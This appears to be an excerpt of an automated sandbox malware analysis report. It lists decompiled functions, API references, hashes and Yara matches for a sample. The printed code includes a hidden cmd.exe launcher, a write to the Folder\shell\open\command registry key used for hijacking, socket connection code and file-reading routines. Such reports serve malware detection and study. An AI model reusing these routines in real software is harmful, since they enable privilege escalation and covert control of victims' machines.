                                                                    • _free.LIBCMT ref: 0041149C
                                                                    • _free.LIBCMT ref: 004114A7
                                                                    • _free.LIBCMT ref: 004114B2
                                                                    • _free.LIBCMT ref: 004114BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 6c96f07cb90ea9fab43ba37695e38d911ba13b3d7ed7c0729b21a385296e5a21
                                                                    • Instruction ID: 2bdb006d657b78d1340e5f5b3a01fd7fcf3dcd6afd61c4df0191f56696f6549a
                                                                    • Opcode Fuzzy Hash: 6c96f07cb90ea9fab43ba37695e38d911ba13b3d7ed7c0729b21a385296e5a21
                                                                    • Instruction Fuzzy Hash: 0C115471D40708AAE520BBB2EC07FDB77DC5F40704F40482FB7ADAA4A2D67DB5454698
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D17948 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64sleepprocessmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 64%
                                                                    			E02D17948(void* __eflags) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				CHAR* _t27;

				_v8 = 0;
				E02D1F7E0( &_v8);
				_t27 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
				GetWindowsDirectoryA(_t27, 0x104);
				E02D1102C( &(_t27[lstrlenA(_t27)]), "\\System32\\cmd.exe", 0x14);
				E02D11052( &_v100, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreateProcessA(_t27, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24) == 0) {
					return E02D1F7B9(_v8);
				}
				Sleep(0x3e8);
				return _v24.dwProcessId;
			}







                                                                    0x02d17956
                                                                    0x02d17959
                                                                    0x02d17971
                                                                    0x02d17979
                                                                    0x02d17990
                                                                    0x02d1799c
                                                                    0x02d179a6
                                                                    0x02d179aa
                                                                    0x02d179ab
                                                                    0x02d179ac
                                                                    0x02d179c9
                                                                    0x00000000
                                                                    0x02d179de
                                                                    0x02d179d0
                                                                    0x00000000

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 02D1796B
                                                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 02D17979
                                                                    • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 02D17987
                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02D179C1
                                                                    • Sleep.KERNEL32(000003E8), ref: 02D179D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
                                                                    • String ID: \System32\cmd.exe
                                                                    • API String ID: 2560724043-2003734499
                                                                    • Opcode ID: 8b854b661cbbc441fe7c7d6bfe295bffaeedb0bacafedc44db2bfbeeba681b77
                                                                    • Instruction ID: c4c02dc4a71dc0a614bcd8b09dfe3e0adeb91a2989400de12759817343a58128
                                                                    • Opcode Fuzzy Hash: 8b854b661cbbc441fe7c7d6bfe295bffaeedb0bacafedc44db2bfbeeba681b77
                                                                    • Instruction Fuzzy Hash: F21170B1A40218BFE711A7A4EC86FAF776DEF14744F100425F706B6280DA709E088A75
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21855 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38registrystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D21855(void* __ecx, char* _a4, CHAR* _a8) {
				void* _v8;
				long _t9;
				int _t12;
				int _t15;
				long _t16;

				_t15 = lstrlenA(_a8);
				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
				if(_t9 == 0) {
					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
					RegCloseKey(_v8);
					if(_t16 == 0) {
						_t12 = 1;
					} else {
						SetLastError(_t16);
						goto L2;
					}
				} else {
					SetLastError(_t9);
					L2:
					_t12 = 0;
				}
				return _t12;
			}








                                                                    0x02d21863
                                                                    0x02d2187a
                                                                    0x02d21882
                                                                    0x02d218a6
                                                                    0x02d218a8
                                                                    0x02d218b0
                                                                    0x02d218b5
                                                                    0x02d218b2
                                                                    0x02d21885
                                                                    0x00000000
                                                                    0x02d21885
                                                                    0x02d21884
                                                                    0x02d21885
                                                                    0x02d21885
                                                                    0x02d2188b
                                                                    0x02d2188b
                                                                    0x02d218b9

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(02D21B3D,02D26056,?,?,02D21B3D,02D26056,?), ref: 02D2185D
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,02D21B3D,02D26056,?), ref: 02D2187A
                                                                    • SetLastError.KERNEL32(00000000,?,?,02D21B3D,02D26056,?), ref: 02D21885
                                                                    • RegSetValueExA.ADVAPI32(?,02D26056,00000000,00000001,02D21B3D,00000000,?,?,02D21B3D,02D26056,?), ref: 02D2189D
                                                                    • RegCloseKey.ADVAPI32(?,?,?,02D21B3D,02D26056,?), ref: 02D218A8
                                                                    Strings
                                                                    • Software\Classes\Folder\shell\open\command, xrefs: 02D21870
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseErrorLastOpenValuelstrlen
                                                                    • String ID: Software\Classes\Folder\shell\open\command
                                                                    • API String ID: 1613093083-2536721355
                                                                    • Opcode ID: 811ce63d6afee9500bd3b114ce5e44934341825bd9143f41abbb81b2e94a42d2
                                                                    • Instruction ID: b4a14ef665fd2fbb881e6e2fd1db25af5148c02ba704c675cbaf4ec106dcd6d6
                                                                    • Opcode Fuzzy Hash: 811ce63d6afee9500bd3b114ce5e44934341825bd9143f41abbb81b2e94a42d2
                                                                    • Instruction Fuzzy Hash: DCF06D35940224FBEF310FA0AC49FDA7BA9AF24754F128550FD06A6241D671CE58DA90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040C494 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0040C445,?,?,0040C40D,00000000,00000000), ref: 0040C4B4
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040C4C7
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0040C445,?,?,0040C40D,00000000,00000000), ref: 0040C4EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll$}@
                                                                    • API String ID: 4061214504-912113946
                                                                    • Opcode ID: aba9c075f4428f1833a5047fddeba3888d56f658dcc70b1a49245315991d59be
                                                                    • Instruction ID: 275bddc8ffa87348f51de93e00ed8d184b328067aaea87e7f03a6c3186bd3e18
                                                                    • Opcode Fuzzy Hash: aba9c075f4428f1833a5047fddeba3888d56f658dcc70b1a49245315991d59be
                                                                    • Instruction Fuzzy Hash: F4F08C30A40208FBCB119B91DD59BEEBFB4EB04755F0081BEE805A22A0DF785D41CA99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D17CB7 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 50%
                                                                    			E02D17CB7(intOrPtr _a4) {
				intOrPtr* _t2;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t10;

				_t2 =  *0x2e5e0c0;
				if(_t2 == 0) {
					L2:
					_t10 = GetModuleHandleW(L"ntdll.dll");
					 *0x2e5e0c0 = GetProcAddress(_t10, "RtlNtStatusToDosError");
					_t8 = GetProcAddress(_t10, "RtlSetLastWin32Error");
					_t2 =  *0x2e5e0c0;
					 *0x2e5e098 = _t8;
				} else {
					_t8 =  *0x2e5e098;
					if(_t8 == 0) {
						goto L2;
					}
				}
				if(_t2 != 0 && _t8 != 0) {
					return  *0x2e5e098( *_t2(_a4));
				}
				return _t2;
			}






                                                                    0x02d17cba
                                                                    0x02d17cc1
                                                                    0x02d17ccd
                                                                    0x02d17cd9
                                                                    0x02d17ced
                                                                    0x02d17cf8
                                                                    0x02d17cfa
                                                                    0x02d17cff
                                                                    0x02d17cc3
                                                                    0x02d17cc3
                                                                    0x02d17ccb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d17ccb
                                                                    0x02d17d08
                                                                    0x00000000
                                                                    0x02d17d14
                                                                    0x02d17d1b

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,02D186D6,00000000), ref: 02D17CD3
                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 02D17CE1
                                                                    • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 02D17CF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                    • API String ID: 667068680-2897241497
                                                                    • Opcode ID: 524014d0efd6e9fb900e25fc446d77d76bfe43465a3d6aabaa74bb41acbb5b5a
                                                                    • Instruction ID: f199978258c1265db8546a335aa2fde0e2765a77ed2f1a007b23d10b32b56676
                                                                    • Opcode Fuzzy Hash: 524014d0efd6e9fb900e25fc446d77d76bfe43465a3d6aabaa74bb41acbb5b5a
                                                                    • Instruction Fuzzy Hash: C1F03070AD0315ABBB185F66B805A367BA8BF946053544818ED0AD3350D7309DA9CA20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405CA1 Relevance: 9.2, APIs: 6, Instructions: 242COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharNextA.USER32(00000000,?,?,00000000,?), ref: 00405E42
                                                                    • CharNextA.USER32(00000000,?,00000000,?), ref: 00405E54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext
                                                                    • String ID:
                                                                    • API String ID: 3213498283-0
                                                                    • Opcode ID: fc50a8ba57276cf7c451b02e99d65dd48bd1661959ad76e8046885eb8c4734bb
                                                                    • Instruction ID: c6cb30f28e6c2ad1043868ec40e8f38a31f7cf81a7171e88b5cc5b0539237374
                                                                    • Opcode Fuzzy Hash: fc50a8ba57276cf7c451b02e99d65dd48bd1661959ad76e8046885eb8c4734bb
                                                                    • Instruction Fuzzy Hash: DEA12FF0A046298BDB609F24CC547AAB7B4EB44304F1440FED649B7281DB799E85CFAD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405220 Relevance: 9.1, APIs: 6, Instructions: 108registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,?,?,00000000,00000000), ref: 00405285
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004052A8
                                                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 004052F6
                                                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000100,00000000,00000000,00000000,?), ref: 00405341
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00405352
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00405386
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Close$Enum$Open
                                                                    • String ID:
                                                                    • API String ID: 4245071059-0
                                                                    • Opcode ID: 7d455bfb623c1b42d872ad24fdb4c120c767aaf94a8f0a7a2d7cb43f7c612b61
                                                                    • Instruction ID: ecc4f38d2bccc58703b5dd31ef463ab4612dc509b67db1981ea8fb0a29fbedc2
                                                                    • Opcode Fuzzy Hash: 7d455bfb623c1b42d872ad24fdb4c120c767aaf94a8f0a7a2d7cb43f7c612b61
                                                                    • Instruction Fuzzy Hash: 95412BB1D0122C9BDB25CB15CC45BDBBBB8EB58350F0141E9A908A7280DBB49E84CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D157FB Relevance: 9.1, APIs: 6, Instructions: 75networksynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E02D157FB(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v40;
				void* _t36;
				signed int _t40;
				signed int _t42;
				void* _t44;
				signed int _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t55;

				_v8 = _v8 & 0x00000000;
				_t44 = __ecx;
				E02D13125(__ecx,  &_a4);
				 *((intOrPtr*)(_t44 + 4)) = _a8;
				E02D2026F(_t44 + 0x1d8);
				_t47 = 8;
				memset( &_v40, 0, _t47 << 2);
				_v28 = 6;
				_t36 =  &_v40;
				_t53 = 1;
				_v32 = 1;
				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);
				if(_t36 != 0) {
					L4:
					_t53 = 0;
				} else {
					_t54 =  *((intOrPtr*)(_v8 + 0x18));
					_t40 = 2;
					__imp__#23(_t40, 1, 0);
					 *(_t44 + 0xc) = _t40;
					if(_t40 == 0xffffffff) {
						goto L4;
					} else {
						_t55 = _t44 + 0x1c8;
						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
						_t42 = 2;
						 *_t55 = _t42;
						__imp__#9(_a8);
						 *(_t44 + 0x1ca) = _t42;
						__imp__freeaddrinfo(_v8);
						__imp__#4( *(_t44 + 0xc), _t55, 0x10);
						if(_t42 != 0xffffffff) {
							 *((intOrPtr*)(_t44 + 8)) = 1;
							ReleaseMutex( *(_t44 + 0x1d8));
						} else {
							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
							goto L4;
						}
					}
				}
				E02D15EA5(_a4);
				return _t53;
			}















                                                                    0x02d15801
                                                                    0x02d1580c
                                                                    0x02d1580e
                                                                    0x02d1581c
                                                                    0x02d1581f
                                                                    0x02d15826
                                                                    0x02d1582c
                                                                    0x02d15831
                                                                    0x02d15839
                                                                    0x02d15844
                                                                    0x02d15845
                                                                    0x02d15848
                                                                    0x02d15850
                                                                    0x02d158af
                                                                    0x02d158af
                                                                    0x02d15852
                                                                    0x02d1585a
                                                                    0x02d1585d
                                                                    0x02d1585f
                                                                    0x02d15865
                                                                    0x02d1586b
                                                                    0x00000000
                                                                    0x02d1586d
                                                                    0x02d15870
                                                                    0x02d15878
                                                                    0x02d1587e
                                                                    0x02d15882
                                                                    0x02d15885
                                                                    0x02d1588e
                                                                    0x02d15895
                                                                    0x02d158a1
                                                                    0x02d158aa
                                                                    0x02d158c8
                                                                    0x02d158cb
                                                                    0x02d158ac
                                                                    0x02d158ac
                                                                    0x00000000
                                                                    0x02d158ac
                                                                    0x02d158aa
                                                                    0x02d1586b
                                                                    0x02d158b4
                                                                    0x02d158bf

                                                                    APIs
                                                                      • Part of subcall function 02D13125: lstrcatA.KERNEL32(00000000,745D0770,?,00000000,?,02D135C4,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D13151
                                                                      • Part of subcall function 02D2026F: WaitForSingleObject.KERNEL32(?,000000FF,02D15824,745D0770,?,?,00000000,02D14EA0,?,?,?,?,?,00000000,745D0770), ref: 02D20273
                                                                    • getaddrinfo.WS2_32(745D0770,00000000,02D14EA0,00000000), ref: 02D15848
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 02D1585F
                                                                    • htons.WS2_32(00000000), ref: 02D15885
                                                                    • freeaddrinfo.WS2_32(00000000), ref: 02D15895
                                                                    • connect.WS2_32(?,?,00000010), ref: 02D158A1
                                                                    • ReleaseMutex.KERNEL32(?), ref: 02D158CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                                                    • String ID:
                                                                    • API String ID: 2516106447-0
                                                                    • Opcode ID: 672770af6d68803e74272dc6836cd289bf9de4a821807d3781dfd21372390071
                                                                    • Instruction ID: 9b3417c3656405ce83012d6b7d622ba5d8287f19eb958db3ad472cb2a9142b6e
                                                                    • Opcode Fuzzy Hash: 672770af6d68803e74272dc6836cd289bf9de4a821807d3781dfd21372390071
                                                                    • Instruction Fuzzy Hash: 0E215A71A40204EBDF10DF61E888BDABBB9FF94320F118466ED19AB290D7719D54CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1CBA8 Relevance: 9.1, APIs: 6, Instructions: 73filememoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 82%
                                                                    			E02D1CBA8(WCHAR* __ecx, void** __edx, long* _a4) {
				void** _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				long* _t14;
				long _t16;
				void* _t17;
				long* _t24;
				void* _t32;
				struct _OVERLAPPED* _t34;
				void* _t36;

				_t34 = 0;
				_v8 = __edx;
				_t36 =  *0x2d297ac - _t34; // 0x0
				if(_t36 == 0) {
					_t32 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0, 0);
					if(_t32 != 0 && _t32 != 0xffffffff) {
						_t14 =  &_v20;
						__imp__GetFileSizeEx(_t32, _t14);
						if(_t14 != 0 && _v16 == 0) {
							_t16 = _v20;
							_t24 = _a4;
							 *_t24 = _t16;
							_t17 = LocalAlloc(0x40, _t16);
							 *_v8 = _t17;
							if(_t17 != 0) {
								if(ReadFile(_t32, _t17,  *_t24,  &_v12, 0) == 0 ||  *_t24 != _v12) {
									LocalFree( *_v8);
								} else {
									_t34 = 1;
								}
							}
						}
						CloseHandle(_t32);
					}
				} else {
					_t34 = E02D1CC54(__ecx, __edx, _a4);
				}
				return _t34;
			}














                                                                    0x02d1cbaf
                                                                    0x02d1cbb3
                                                                    0x02d1cbb6
                                                                    0x02d1cbbc
                                                                    0x02d1cbe2
                                                                    0x02d1cbe6
                                                                    0x02d1cbed
                                                                    0x02d1cbf2
                                                                    0x02d1cbfa
                                                                    0x02d1cc01
                                                                    0x02d1cc05
                                                                    0x02d1cc0b
                                                                    0x02d1cc0d
                                                                    0x02d1cc16
                                                                    0x02d1cc1a
                                                                    0x02d1cc2d
                                                                    0x02d1cc40
                                                                    0x02d1cc36
                                                                    0x02d1cc38
                                                                    0x02d1cc38
                                                                    0x02d1cc2d
                                                                    0x02d1cc46
                                                                    0x02d1cc48
                                                                    0x02d1cc48
                                                                    0x02d1cbbe
                                                                    0x02d1cbc7
                                                                    0x02d1cbc7
                                                                    0x02d1cc53

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000,?), ref: 02D1CBDC
                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 02D1CBF2
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 02D1CC0D
                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?), ref: 02D1CC25
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 02D1CC48
                                                                      • Part of subcall function 02D1CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC73
                                                                      • Part of subcall function 02D1CC54: LocalAlloc.KERNEL32(00000040,?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CC81
                                                                      • Part of subcall function 02D1CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC97
                                                                      • Part of subcall function 02D1CC54: LocalFree.KERNEL32(?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CCA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 4225742195-0
                                                                    • Opcode ID: 762cbc526056f4cf44214f4fea64f7a5c8de0543c0f10f768e362d707a902020
                                                                    • Instruction ID: 965e87525d58e24a7b2b9f997eec17d72058940499618633a5c53587c6458d0e
                                                                    • Opcode Fuzzy Hash: 762cbc526056f4cf44214f4fea64f7a5c8de0543c0f10f768e362d707a902020
                                                                    • Instruction Fuzzy Hash: 0811C071A80124FBCB258F69EC84EAEBBBAEF45650B004416F901E6350D7309D10CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040948E Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00409485,004086B2,00407FA2), ref: 0040949C
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004094AA
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004094C3
                                                                    • SetLastError.KERNEL32(00000000,00409485,004086B2,00407FA2), ref: 00409515
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
